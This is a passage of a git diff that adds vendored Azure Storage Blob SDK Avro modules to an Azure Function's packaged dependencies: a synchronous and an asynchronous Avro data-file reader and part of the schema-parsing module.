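+        # parse, so the raw decoder doubles as the datum decoder immediately.)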
+ if self._header_reader is not None: + self._datum_decoder = self._raw_decoder + + self.datum_reader.writer_schema = ( + schema.parse(self.get_meta(SCHEMA_KEY).decode('utf-8'))) + + def __enter__(self): + return self + + def __exit__(self, data_type, value, traceback): + # Perform a close if there's no exception + if data_type is None: + self.close() + + def __iter__(self): + return self + + # read-only properties + @property + def reader(self): + return self._reader + + @property + def raw_decoder(self): + return self._raw_decoder + + @property + def datum_decoder(self): + return self._datum_decoder + + @property + def datum_reader(self): + return self._datum_reader + + @property + def sync_marker(self): + return self._sync_marker + + @property + def meta(self): + return self._meta + + # read/write properties + @property + def block_count(self): + return self._block_count + + def get_meta(self, key): + """Reports the value of a given metadata key. + + Args: + key: Metadata key (string) to report the value of. + Returns: + Value associated to the metadata key, as bytes. + """ + return self._meta.get(key) + + def _read_header(self): + header_reader = self._header_reader if self._header_reader else self._reader + header_decoder = self._header_decoder if self._header_decoder else self._raw_decoder + + # seek to the beginning of the file to get magic block + header_reader.seek(0, 0) + + # read header into a dict + header = self.datum_reader.read_data(META_SCHEMA, header_decoder) + + # check magic number + if header.get('magic') != MAGIC: + fail_msg = "Not an Avro data file: %s doesn't match %s." \ + % (header.get('magic'), MAGIC) + raise schema.AvroException(fail_msg) + + # set metadata + self._meta = header['meta'] + + # set sync marker + self._sync_marker = header['sync'] + + def _read_block_header(self): + self._block_count = self.raw_decoder.read_long() + if self.codec == "null": + # Skip a long; we don't need to use the length. + self.raw_decoder.skip_long() + self._datum_decoder = self._raw_decoder + elif self.codec == 'deflate': + # Compressed data is stored as (length, data), which + # corresponds to how the "bytes" type is encoded. + data = self.raw_decoder.read_bytes() + # -15 is the log of the window size; negative indicates + # "raw" (no zlib headers) decompression. See zlib.h. + uncompressed = zlib.decompress(data, -15) + self._datum_decoder = avro_io.BinaryDecoder(io.BytesIO(uncompressed)) + else: + raise DataFileException("Unknown codec: %r" % self.codec) + + def _skip_sync(self): + """ + Read the length of the sync marker; if it matches the sync marker, + return True. Otherwise, seek back to where we started and return False. + """ + proposed_sync_marker = self.reader.read(SYNC_SIZE) + if SYNC_SIZE > 0 and not proposed_sync_marker: + raise StopIteration + if proposed_sync_marker != self.sync_marker: + self.reader.seek(-SYNC_SIZE, 1) + + def __next__(self): + """Return the next datum in the file.""" + if self.block_count == 0: + self._skip_sync() + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro file with this attr. 
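+        # (track_object_position() is assumed to snapshot the current stream
+        # offset so a later reader can resume from this block instead of
+        # re-downloading the file from the start.)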
+ if hasattr(self._reader, 'object_position'): + self.reader.track_object_position() + self._cur_object_index = 0 + + self._read_block_header() + + datum = self.datum_reader.read(self.datum_decoder) + self._block_count -= 1 + self._cur_object_index += 1 + + # object_position is to support reading from current position in the future read, + # This will track the index of the next item to be read. + # This will also track the offset before the next sync marker. + if hasattr(self._reader, 'object_position'): + if self.block_count == 0: + # the next event to be read is at index 0 in the new chunk of blocks, + self.reader.track_object_position() + self.reader.set_object_index(0) + else: + self.reader.set_object_index(self._cur_object_index) + + return datum + + # PY2 + def next(self): + return self.__next__() + + def close(self): + """Close this reader.""" + self.reader.close() + + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile_async.py new file mode 100644 index 0000000..f0cd821 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile_async.py @@ -0,0 +1,215 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +"""Read/Write Avro File Object Containers.""" + +import logging +import sys + +from ..avro import avro_io_async +from ..avro import schema +from .datafile import DataFileException +from .datafile import MAGIC, SYNC_SIZE, META_SCHEMA, SCHEMA_KEY + + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +# Codecs supported by container files: +VALID_CODECS = frozenset(['null']) + + +class AsyncDataFileReader(object): # pylint: disable=too-many-instance-attributes + """Read files written by DataFileWriter.""" + + def __init__(self, reader, datum_reader, **kwargs): + """Initializes a new data file reader. + + Args: + reader: Open file to read from. + datum_reader: Avro datum reader. + """ + self._reader = reader + self._raw_decoder = avro_io_async.AsyncBinaryDecoder(reader) + self._header_reader = kwargs.pop('header_reader', None) + self._header_decoder = None if self._header_reader is None else \ + avro_io_async.AsyncBinaryDecoder(self._header_reader) + self._datum_decoder = None # Maybe reset at every block. + self._datum_reader = datum_reader + self.codec = "null" + self._block_count = 0 + self._cur_object_index = 0 + self._meta = None + self._sync_marker = None + + async def init(self): + # In case self._reader only has partial content(without header). + # seek(0, 0) to make sure read the (partial)content from beginning. 
+ await self._reader.seek(0, 0) + + # read the header: magic, meta, sync + await self._read_header() + + # ensure codec is valid + avro_codec_raw = self.get_meta('avro.codec') + if avro_codec_raw is None: + self.codec = "null" + else: + self.codec = avro_codec_raw.decode('utf-8') + if self.codec not in VALID_CODECS: + raise DataFileException('Unknown codec: %s.' % self.codec) + + # get ready to read + self._block_count = 0 + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro. + if hasattr(self._reader, 'object_position'): + self.reader.track_object_position() + + # header_reader indicates reader only has partial content. The reader doesn't have block header, + # so we read use the block count stored last time. + # Also ChangeFeed only has codec==null, so use _raw_decoder is good. + if self._header_reader is not None: + self._datum_decoder = self._raw_decoder + self.datum_reader.writer_schema = ( + schema.parse(self.get_meta(SCHEMA_KEY).decode('utf-8'))) + return self + + async def __aenter__(self): + return self + + async def __aexit__(self, data_type, value, traceback): + # Perform a close if there's no exception + if data_type is None: + self.close() + + def __aiter__(self): + return self + + # read-only properties + @property + def reader(self): + return self._reader + + @property + def raw_decoder(self): + return self._raw_decoder + + @property + def datum_decoder(self): + return self._datum_decoder + + @property + def datum_reader(self): + return self._datum_reader + + @property + def sync_marker(self): + return self._sync_marker + + @property + def meta(self): + return self._meta + + # read/write properties + @property + def block_count(self): + return self._block_count + + def get_meta(self, key): + """Reports the value of a given metadata key. + + Args: + key: Metadata key (string) to report the value of. + Returns: + Value associated to the metadata key, as bytes. + """ + return self._meta.get(key) + + async def _read_header(self): + header_reader = self._header_reader if self._header_reader else self._reader + header_decoder = self._header_decoder if self._header_decoder else self._raw_decoder + + # seek to the beginning of the file to get magic block + await header_reader.seek(0, 0) + + # read header into a dict + header = await self.datum_reader.read_data(META_SCHEMA, header_decoder) + + # check magic number + if header.get('magic') != MAGIC: + fail_msg = "Not an Avro data file: %s doesn't match %s." \ + % (header.get('magic'), MAGIC) + raise schema.AvroException(fail_msg) + + # set metadata + self._meta = header['meta'] + + # set sync marker + self._sync_marker = header['sync'] + + async def _read_block_header(self): + self._block_count = await self.raw_decoder.read_long() + if self.codec == "null": + # Skip a long; we don't need to use the length. + await self.raw_decoder.skip_long() + self._datum_decoder = self._raw_decoder + else: + raise DataFileException("Unknown codec: %r" % self.codec) + + async def _skip_sync(self): + """ + Read the length of the sync marker; if it matches the sync marker, + return True. Otherwise, seek back to where we started and return False. 
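+        The sync marker is the 16-byte value recorded in the file header;
+        reading zero bytes here means end-of-stream and ends iteration.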
+ """ + proposed_sync_marker = await self.reader.read(SYNC_SIZE) + if SYNC_SIZE > 0 and not proposed_sync_marker: + raise StopAsyncIteration + if proposed_sync_marker != self.sync_marker: + await self.reader.seek(-SYNC_SIZE, 1) + + async def __anext__(self): + """Return the next datum in the file.""" + if self.block_count == 0: + await self._skip_sync() + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro file with this attr. + if hasattr(self._reader, 'object_position'): + await self.reader.track_object_position() + self._cur_object_index = 0 + + await self._read_block_header() + + datum = await self.datum_reader.read(self.datum_decoder) + self._block_count -= 1 + self._cur_object_index += 1 + + # object_position is to support reading from current position in the future read, + # This will track the index of the next item to be read. + # This will also track the offset before the next sync marker. + if hasattr(self._reader, 'object_position'): + if self.block_count == 0: + # the next event to be read is at index 0 in the new chunk of blocks, + await self.reader.track_object_position() + await self.reader.set_object_index(0) + else: + await self.reader.set_object_index(self._cur_object_index) + + return datum + + def close(self): + """Close this reader.""" + self.reader.close() + + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/schema.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/schema.py new file mode 100644 index 0000000..68d2819 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/schema.py @@ -0,0 +1,1221 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-many-lines + +"""Representation of Avro schemas. + +A schema may be one of: + - A record, mapping field names to field value data; + - An error, equivalent to a record; + - An enum, containing one of a small set of symbols; + - An array of values, all of the same schema; + - A map containing string/value pairs, each of a declared schema; + - A union of other schemas; + - A fixed sized binary object; + - A unicode string; + - A sequence of bytes; + - A 32-bit signed int; + - A 64-bit signed long; + - A 32-bit floating-point float; + - A 64-bit floating-point double; + - A boolean; + - Null. +""" + +import abc +import json +import logging +import re +import sys +from six import with_metaclass + +PY2 = sys.version_info[0] == 2 + +if PY2: + _str = unicode # pylint: disable=undefined-variable +else: + _str = str + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +# Log level more verbose than DEBUG=10, INFO=20, etc. 
+DEBUG_VERBOSE = 5 + +NULL = 'null' +BOOLEAN = 'boolean' +STRING = 'string' +BYTES = 'bytes' +INT = 'int' +LONG = 'long' +FLOAT = 'float' +DOUBLE = 'double' +FIXED = 'fixed' +ENUM = 'enum' +RECORD = 'record' +ERROR = 'error' +ARRAY = 'array' +MAP = 'map' +UNION = 'union' + +# Request and error unions are part of Avro protocols: +REQUEST = 'request' +ERROR_UNION = 'error_union' + +PRIMITIVE_TYPES = frozenset([ + NULL, + BOOLEAN, + STRING, + BYTES, + INT, + LONG, + FLOAT, + DOUBLE, +]) + +NAMED_TYPES = frozenset([ + FIXED, + ENUM, + RECORD, + ERROR, +]) + +VALID_TYPES = frozenset.union( + PRIMITIVE_TYPES, + NAMED_TYPES, + [ + ARRAY, + MAP, + UNION, + REQUEST, + ERROR_UNION, + ], +) + +SCHEMA_RESERVED_PROPS = frozenset([ + 'type', + 'name', + 'namespace', + 'fields', # Record + 'items', # Array + 'size', # Fixed + 'symbols', # Enum + 'values', # Map + 'doc', +]) + +FIELD_RESERVED_PROPS = frozenset([ + 'default', + 'name', + 'doc', + 'order', + 'type', +]) + +VALID_FIELD_SORT_ORDERS = frozenset([ + 'ascending', + 'descending', + 'ignore', +]) + + +# ------------------------------------------------------------------------------ +# Exceptions + + +class Error(Exception): + """Base class for errors in this module.""" + + +class AvroException(Error): + """Generic Avro schema error.""" + + +class SchemaParseException(AvroException): + """Error while parsing a JSON schema descriptor.""" + + +class Schema(with_metaclass(abc.ABCMeta, object)): + """Abstract base class for all Schema classes.""" + + def __init__(self, data_type, other_props=None): + """Initializes a new schema object. + + Args: + data_type: Type of the schema to initialize. + other_props: Optional dictionary of additional properties. + """ + if data_type not in VALID_TYPES: + raise SchemaParseException('%r is not a valid Avro type.' % data_type) + + # All properties of this schema, as a map: property name -> property value + self._props = {} + + self._props['type'] = data_type + self._type = data_type + + if other_props: + self._props.update(other_props) + + @property + def namespace(self): + """Returns: the namespace this schema belongs to, if any, or None.""" + return self._props.get('namespace', None) + + @property + def type(self): + """Returns: the type of this schema.""" + return self._type + + @property + def doc(self): + """Returns: the documentation associated to this schema, if any, or None.""" + return self._props.get('doc', None) + + @property + def props(self): + """Reports all the properties of this schema. + + Includes all properties, reserved and non reserved. + JSON properties of this schema are directly generated from this dict. + + Returns: + A dictionary of properties associated to this schema. + """ + return self._props + + @property + def other_props(self): + """Returns: the dictionary of non-reserved properties.""" + return dict(filter_keys_out(items=self._props, keys=SCHEMA_RESERVED_PROPS)) + + def __str__(self): + """Returns: the JSON representation of this schema.""" + return json.dumps(self.to_json(names=None)) + + @abc.abstractmethod + def to_json(self, names): + """Converts the schema object into its AVRO specification representation. + + Schema types that have names (records, enums, and fixed) must + be aware of not re-defining schemas that are already listed + in the parameter names. 
+ """ + raise Exception('Cannot run abstract method.') + + +# ------------------------------------------------------------------------------ + + +_RE_NAME = re.compile(r'[A-Za-z_][A-Za-z0-9_]*') + +_RE_FULL_NAME = re.compile( + r'^' + r'[.]?(?:[A-Za-z_][A-Za-z0-9_]*[.])*' # optional namespace + r'([A-Za-z_][A-Za-z0-9_]*)' # name + r'$' +) + + +class Name(object): + """Representation of an Avro name.""" + + def __init__(self, name, namespace=None): + """Parses an Avro name. + + Args: + name: Avro name to parse (relative or absolute). + namespace: Optional explicit namespace if the name is relative. + """ + # Normalize: namespace is always defined as a string, possibly empty. + if namespace is None: + namespace = '' + + if '.' in name: + # name is absolute, namespace is ignored: + self._fullname = name + + match = _RE_FULL_NAME.match(self._fullname) + if match is None: + raise SchemaParseException( + 'Invalid absolute schema name: %r.' % self._fullname) + + self._name = match.group(1) + self._namespace = self._fullname[:-(len(self._name) + 1)] + + else: + # name is relative, combine with explicit namespace: + self._name = name + self._namespace = namespace + self._fullname = (self._name + if (not self._namespace) else + '%s.%s' % (self._namespace, self._name)) + + # Validate the fullname: + if _RE_FULL_NAME.match(self._fullname) is None: + raise SchemaParseException( + 'Invalid schema name %r infered from name %r and namespace %r.' + % (self._fullname, self._name, self._namespace)) + + def __eq__(self, other): + if not isinstance(other, Name): + return NotImplemented + return self.fullname == other.fullname + + @property + def simple_name(self): + """Returns: the simple name part of this name.""" + return self._name + + @property + def namespace(self): + """Returns: this name's namespace, possible the empty string.""" + return self._namespace + + @property + def fullname(self): + """Returns: the full name.""" + return self._fullname + + +# ------------------------------------------------------------------------------ + + +class Names(object): + """Tracks Avro named schemas and default namespace during parsing.""" + + def __init__(self, default_namespace=None, names=None): + """Initializes a new name tracker. + + Args: + default_namespace: Optional default namespace. + names: Optional initial mapping of known named schemas. + """ + if names is None: + names = {} + self._names = names + self._default_namespace = default_namespace + + @property + def names(self): + """Returns: the mapping of known named schemas.""" + return self._names + + @property + def default_namespace(self): + """Returns: the default namespace, if any, or None.""" + return self._default_namespace + + def new_with_default_namespace(self, namespace): + """Creates a new name tracker from this tracker, but with a new default ns. + + Args: + namespace: New default namespace to use. + Returns: + New name tracker with the specified default namespace. + """ + return Names(names=self._names, default_namespace=namespace) + + def get_name(self, name, namespace=None): + """Resolves the Avro name according to this name tracker's state. + + Args: + name: Name to resolve (absolute or relative). + namespace: Optional explicit namespace. + Returns: + The specified name, resolved according to this tracker. + """ + if namespace is None: + namespace = self._default_namespace + return Name(name=name, namespace=namespace) + + def get_schema(self, name, namespace=None): + """Resolves an Avro schema by name. 
+ + Args: + name: Name (relative or absolute) of the Avro schema to look up. + namespace: Optional explicit namespace. + Returns: + The schema with the specified name, if any, or None. + """ + avro_name = self.get_name(name=name, namespace=namespace) + return self._names.get(avro_name.fullname, None) + + def prune_namespace(self, properties): + """given a properties, return properties with namespace removed if + it matches the own default namespace + """ + if self.default_namespace is None: + # I have no default -- no change + return properties + if 'namespace' not in properties: + # he has no namespace - no change + return properties + if properties['namespace'] != self.default_namespace: + # we're different - leave his stuff alone + return properties + # we each have a namespace and it's redundant. delete his. + prunable = properties.copy() + del prunable['namespace'] + return prunable + + def register(self, schema): + """Registers a new named schema in this tracker. + + Args: + schema: Named Avro schema to register in this tracker. + """ + if schema.fullname in VALID_TYPES: + raise SchemaParseException( + '%s is a reserved type name.' % schema.fullname) + if schema.fullname in self.names: + raise SchemaParseException( + 'Avro name %r already exists.' % schema.fullname) + + logger.log(DEBUG_VERBOSE, 'Register new name for %r', schema.fullname) + self._names[schema.fullname] = schema + + +# ------------------------------------------------------------------------------ + + +class NamedSchema(Schema): + """Abstract base class for named schemas. + + Named schemas are enumerated in NAMED_TYPES. + """ + + def __init__( + self, + data_type, + name=None, + namespace=None, + names=None, + other_props=None, + ): + """Initializes a new named schema object. + + Args: + data_type: Type of the named schema. + name: Name (absolute or relative) of the schema. + namespace: Optional explicit namespace if name is relative. + names: Tracker to resolve and register Avro names. + other_props: Optional map of additional properties of the schema. + """ + assert (data_type in NAMED_TYPES), ('Invalid named type: %r' % data_type) + self._avro_name = names.get_name(name=name, namespace=namespace) + + super(NamedSchema, self).__init__(data_type, other_props) + + names.register(self) + + self._props['name'] = self.name + if self.namespace: + self._props['namespace'] = self.namespace + + @property + def avro_name(self): + """Returns: the Name object describing this schema's name.""" + return self._avro_name + + @property + def name(self): + return self._avro_name.simple_name + + @property + def namespace(self): + return self._avro_name.namespace + + @property + def fullname(self): + return self._avro_name.fullname + + def name_ref(self, names): + """Reports this schema name relative to the specified name tracker. + + Args: + names: Avro name tracker to relativise this schema name against. + Returns: + This schema name, relativised against the specified name tracker. + """ + if self.namespace == names.default_namespace: + return self.name + return self.fullname + + @abc.abstractmethod + def to_json(self, names): + """Converts the schema object into its AVRO specification representation. + + Schema types that have names (records, enums, and fixed) must + be aware of not re-defining schemas that are already listed + in the parameter names. 
+ """ + raise Exception('Cannot run abstract method.') + +# ------------------------------------------------------------------------------ + + +_NO_DEFAULT = object() + + +class Field(object): + """Representation of the schema of a field in a record.""" + + def __init__( + self, + data_type, + name, + index, + has_default, + default=_NO_DEFAULT, + order=None, + doc=None, + other_props=None + ): + """Initializes a new Field object. + + Args: + data_type: Avro schema of the field. + name: Name of the field. + index: 0-based position of the field. + has_default: + default: + order: + doc: + other_props: + """ + if (not isinstance(name, _str)) or (not name): + raise SchemaParseException('Invalid record field name: %r.' % name) + if (order is not None) and (order not in VALID_FIELD_SORT_ORDERS): + raise SchemaParseException('Invalid record field order: %r.' % order) + + # All properties of this record field: + self._props = {} + + self._has_default = has_default + if other_props: + self._props.update(other_props) + + self._index = index + self._type = self._props['type'] = data_type + self._name = self._props['name'] = name + + if has_default: + self._props['default'] = default + + if order is not None: + self._props['order'] = order + + if doc is not None: + self._props['doc'] = doc + + @property + def type(self): + """Returns: the schema of this field.""" + return self._type + + @property + def name(self): + """Returns: this field name.""" + return self._name + + @property + def index(self): + """Returns: the 0-based index of this field in the record.""" + return self._index + + @property + def default(self): + return self._props['default'] + + @property + def has_default(self): + return self._has_default + + @property + def order(self): + return self._props.get('order', None) + + @property + def doc(self): + return self._props.get('doc', None) + + @property + def props(self): + return self._props + + @property + def other_props(self): + return filter_keys_out(items=self._props, keys=FIELD_RESERVED_PROPS) + + def __str__(self): + return json.dumps(self.to_json()) + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = self.props.copy() + to_dump['type'] = self.type.to_json(names) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ +# Primitive Types + + +class PrimitiveSchema(Schema): + """Schema of a primitive Avro type. + + Valid primitive types are defined in PRIMITIVE_TYPES. + """ + + def __init__(self, data_type, other_props=None): + """Initializes a new schema object for the specified primitive type. + + Args: + data_type: Type of the schema to construct. Must be primitive. + """ + if data_type not in PRIMITIVE_TYPES: + raise AvroException('%r is not a valid primitive type.' % data_type) + super(PrimitiveSchema, self).__init__(data_type, other_props=other_props) + + @property + def name(self): + """Returns: the simple name of this schema.""" + # The name of a primitive type is the type itself. + return self.type + + @property + def fullname(self): + """Returns: the fully qualified name of this schema.""" + # The full name is the simple name for primitive schema. 
+ return self.name + + def to_json(self, names=None): + if len(self.props) == 1: + return self.fullname + return self.props + + def __eq__(self, that): + return self.props == that.props + + +# ------------------------------------------------------------------------------ +# Complex Types (non-recursive) + + +class FixedSchema(NamedSchema): + def __init__( + self, + name, + namespace, + size, + names=None, + other_props=None, + ): + # Ensure valid ctor args + if not isinstance(size, int): + fail_msg = 'Fixed Schema requires a valid integer for size property.' + raise AvroException(fail_msg) + + super(FixedSchema, self).__init__( + data_type=FIXED, + name=name, + namespace=namespace, + names=names, + other_props=other_props, + ) + self._props['size'] = size + + @property + def size(self): + """Returns: the size of this fixed schema, in bytes.""" + return self._props['size'] + + def to_json(self, names=None): + if names is None: + names = Names() + if self.fullname in names.names: + return self.name_ref(names) + names.names[self.fullname] = self + return names.prune_namespace(self.props) + + def __eq__(self, that): + return self.props == that.props + + +# ------------------------------------------------------------------------------ + + +class EnumSchema(NamedSchema): + def __init__( + self, + name, + namespace, + symbols, + names=None, + doc=None, + other_props=None, + ): + """Initializes a new enumeration schema object. + + Args: + name: Simple name of this enumeration. + namespace: Optional namespace. + symbols: Ordered list of symbols defined in this enumeration. + names: + doc: + other_props: + """ + symbols = tuple(symbols) + symbol_set = frozenset(symbols) + if (len(symbol_set) != len(symbols) + or not all(map(lambda symbol: isinstance(symbol, _str), symbols))): + raise AvroException( + 'Invalid symbols for enum schema: %r.' % (symbols,)) + + super(EnumSchema, self).__init__( + data_type=ENUM, + name=name, + namespace=namespace, + names=names, + other_props=other_props, + ) + + self._props['symbols'] = symbols + if doc is not None: + self._props['doc'] = doc + + @property + def symbols(self): + """Returns: the symbols defined in this enum.""" + return self._props['symbols'] + + def to_json(self, names=None): + if names is None: + names = Names() + if self.fullname in names.names: + return self.name_ref(names) + names.names[self.fullname] = self + return names.prune_namespace(self.props) + + def __eq__(self, that): + return self.props == that.props + + +# ------------------------------------------------------------------------------ +# Complex Types (recursive) + + +class ArraySchema(Schema): + """Schema of an array.""" + + def __init__(self, items, other_props=None): + """Initializes a new array schema object. + + Args: + items: Avro schema of the array items. 
+ other_props: + """ + super(ArraySchema, self).__init__( + data_type=ARRAY, + other_props=other_props, + ) + self._items_schema = items + self._props['items'] = items + + @property + def items(self): + """Returns: the schema of the items in this array.""" + return self._items_schema + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = self.props.copy() + item_schema = self.items + to_dump['items'] = item_schema.to_json(names) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ + + +class MapSchema(Schema): + """Schema of a map.""" + + def __init__(self, values, other_props=None): + """Initializes a new map schema object. + + Args: + values: Avro schema of the map values. + other_props: + """ + super(MapSchema, self).__init__( + data_type=MAP, + other_props=other_props, + ) + self._values_schema = values + self._props['values'] = values + + @property + def values(self): + """Returns: the schema of the values in this map.""" + return self._values_schema + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = self.props.copy() + to_dump['values'] = self.values.to_json(names) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ + + +class UnionSchema(Schema): + """Schema of a union.""" + + def __init__(self, schemas): + """Initializes a new union schema object. + + Args: + schemas: Ordered collection of schema branches in the union. + """ + super(UnionSchema, self).__init__(data_type=UNION) + self._schemas = tuple(schemas) + + # Validate the schema branches: + + # All named schema names are unique: + named_branches = tuple( + filter(lambda schema: schema.type in NAMED_TYPES, self._schemas)) + unique_names = frozenset(map(lambda schema: schema.fullname, named_branches)) + if len(unique_names) != len(named_branches): + raise AvroException( + 'Invalid union branches with duplicate schema name:%s' + % ''.join(map(lambda schema: ('\n\t - %s' % schema), self._schemas))) + + # Types are unique within unnamed schemas, and union is not allowed: + unnamed_branches = tuple( + filter(lambda schema: schema.type not in NAMED_TYPES, self._schemas)) + unique_types = frozenset(map(lambda schema: schema.type, unnamed_branches)) + if UNION in unique_types: + raise AvroException( + 'Invalid union branches contain other unions:%s' + % ''.join(map(lambda schema: ('\n\t - %s' % schema), self._schemas))) + if len(unique_types) != len(unnamed_branches): + raise AvroException( + 'Invalid union branches with duplicate type:%s' + % ''.join(map(lambda schema: ('\n\t - %s' % schema), self._schemas))) + + @property + def schemas(self): + """Returns: the ordered list of schema branches in the union.""" + return self._schemas + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = [] + for schema in self.schemas: + to_dump.append(schema.to_json(names)) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ + + +class ErrorUnionSchema(UnionSchema): + """Schema representing the declared errors of a protocol message.""" + + def __init__(self, schemas): + """Initializes an error-union 
schema. + + Args: + schema: collection of error schema. + """ + # Prepend "string" to handle system errors + schemas = [PrimitiveSchema(data_type=STRING)] + list(schemas) + super(ErrorUnionSchema, self).__init__(schemas=schemas) + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = [] + for schema in self.schemas: + # Don't print the system error schema + if schema.type == STRING: + continue + to_dump.append(schema.to_json(names)) + return to_dump + + +# ------------------------------------------------------------------------------ + + +class RecordSchema(NamedSchema): + """Schema of a record.""" + + @staticmethod + def _make_field(index, field_desc, names): + """Builds field schemas from a list of field JSON descriptors. + + Args: + index: 0-based index of the field in the record. + field_desc: JSON descriptors of a record field. + Return: + The field schema. + """ + field_schema = schema_from_json_data( + json_data=field_desc['type'], + names=names, + ) + other_props = ( + dict(filter_keys_out(items=field_desc, keys=FIELD_RESERVED_PROPS))) + return Field( + data_type=field_schema, + name=field_desc['name'], + index=index, + has_default=('default' in field_desc), + default=field_desc.get('default', _NO_DEFAULT), + order=field_desc.get('order', None), + doc=field_desc.get('doc', None), + other_props=other_props, + ) + + @staticmethod + def make_field_list(field_desc_list, names): + """Builds field schemas from a list of field JSON descriptors. + + Guarantees field name unicity. + + Args: + field_desc_list: collection of field JSON descriptors. + names: Avro schema tracker. + Yields + Field schemas. + """ + for index, field_desc in enumerate(field_desc_list): + yield RecordSchema._make_field(index, field_desc, names) + + @staticmethod + def _make_field_map(fields): + """Builds the field map. + + Guarantees field name unicity. + + Args: + fields: iterable of field schema. + Returns: + A map of field schemas, indexed by name. + """ + field_map = {} + for field in fields: + if field.name in field_map: + raise SchemaParseException( + 'Duplicate record field name %r.' % field.name) + field_map[field.name] = field + return field_map + + def __init__( + self, + name, + namespace, + fields=None, + make_fields=None, + names=None, + record_type=RECORD, + doc=None, + other_props=None + ): + """Initializes a new record schema object. + + Args: + name: Name of the record (absolute or relative). + namespace: Optional namespace the record belongs to, if name is relative. + fields: collection of fields to add to this record. + Exactly one of fields or make_fields must be specified. + make_fields: function creating the fields that belong to the record. + The function signature is: make_fields(names) -> ordered field list. + Exactly one of fields or make_fields must be specified. + names: + record_type: Type of the record: one of RECORD, ERROR or REQUEST. + Protocol requests are not named. + doc: + other_props: + """ + if record_type == REQUEST: + # Protocol requests are not named: + super(RecordSchema, self).__init__( + data_type=REQUEST, + other_props=other_props, + ) + elif record_type in [RECORD, ERROR]: + # Register this record name in the tracker: + super(RecordSchema, self).__init__( + data_type=record_type, + name=name, + namespace=namespace, + names=names, + other_props=other_props, + ) + else: + raise SchemaParseException( + 'Invalid record type: %r.' 
% record_type) + + if record_type in [RECORD, ERROR]: + avro_name = names.get_name(name=name, namespace=namespace) + nested_names = names.new_with_default_namespace(namespace=avro_name.namespace) + elif record_type == REQUEST: + # Protocol request has no name: no need to change default namespace: + nested_names = names + + if fields is None: + fields = make_fields(names=nested_names) + else: + assert make_fields is None + self._fields = tuple(fields) + + self._field_map = RecordSchema._make_field_map(self._fields) + + self._props['fields'] = fields + if doc is not None: + self._props['doc'] = doc + + @property + def fields(self): + """Returns: the field schemas, as an ordered tuple.""" + return self._fields + + @property + def field_map(self): + """Returns: a read-only map of the field schemas index by field names.""" + return self._field_map + + def to_json(self, names=None): + if names is None: + names = Names() + # Request records don't have names + if self.type == REQUEST: + return [f.to_json(names) for f in self.fields] + + if self.fullname in names.names: + return self.name_ref(names) + names.names[self.fullname] = self + + to_dump = names.prune_namespace(self.props.copy()) + to_dump['fields'] = [f.to_json(names) for f in self.fields] + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ +# Module functions + + +def filter_keys_out(items, keys): + """Filters a collection of (key, value) items. + + Exclude any item whose key belongs to keys. + + Args: + items: Dictionary of items to filter the keys out of. + keys: Keys to filter out. + Yields: + Filtered items. + """ + for key, value in items.items(): + if key in keys: + continue + yield key, value + + +# ------------------------------------------------------------------------------ + + +def _schema_from_json_string(json_string, names): + if json_string in PRIMITIVE_TYPES: + return PrimitiveSchema(data_type=json_string) + + # Look for a known named schema: + schema = names.get_schema(name=json_string) + if schema is None: + raise SchemaParseException( + 'Unknown named schema %r, known names: %r.' 
